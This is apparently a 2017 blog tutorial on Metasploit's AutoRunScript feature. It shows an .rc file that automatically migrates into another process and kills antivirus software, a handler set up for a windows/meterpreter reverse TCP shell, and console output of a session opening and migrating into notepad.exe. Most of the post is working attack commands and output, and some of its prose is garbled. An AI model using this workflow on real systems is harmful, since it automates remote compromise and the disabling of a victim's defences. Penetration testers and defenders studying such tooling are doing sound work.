Wednesday, 26 July 2017

AutoRun Script on Metasploit Framework

In Metasploit it supports an interesting feature called AutoRunScript. This feature can enable users to specify the module operation by creating the .rc file pre-registered automatically during operation Exploit.

It can be shortened for some time on your pentest if we use these features.
How to use AutoRun on metasploit
First, create an .rc file containing the command to run automatically. For example, i created a file named ddos.rc on /root/ direcoty. This file puts the command line to perform automatically at the msf penetration.
# cat /root/ddos.rc
run post/windows/manage/migrate
run post/windows/manage/killav

Now, on metasploit framework, if you choose any exploit module, you need to set AutoRunScript parameter
exploit(handler) #>set LHOST 192.168.1.9
exploit(handler) #>set LPORT 8080
exploit(handler) #>set PAYLOADS windows/meterpreter/reverse_tcp
exploit(handler) #>set AutoRunScript multi_console_command -rc /root/ddos.rc
If successful, then set Exploit ddos.rc to load the file as shown below and perform the specified command, such as migrate, killav. To maintain substantially the same time penetrate and migrate through the secure shell to keep breathing space in the memory of another process or the process to create a new connection in the target PC, this setting can be a bit easier if you pre-register as a script like this.
exploit(handler) #> exploit
[*] Started reverse handler on 192.168.1.9:8080
[*] Starting the payload handler…
[*] Sending stage (885806 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.9:8080 -> 192.168.1.11:1035) at 2016-10-20 20:11:22 +0900
meterpreter >
[*] Session ID 1 (192.168.1.9:8080 -> 192.168.1.11:1035) processing AutoRunScript ‘multi_console_command -rc /root/ddos.rc’
[*] Running Command List …
[*] Running command run post/windows/manage/migrate
[*] Running module against BEGINNER-A36957
[*] Current server process: exc.exe (156)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 780
[+] Successfully migrated to process 780
[*] Running command run post/windows/manage/killav
[*] No target processes were found.

No comments:
Write comments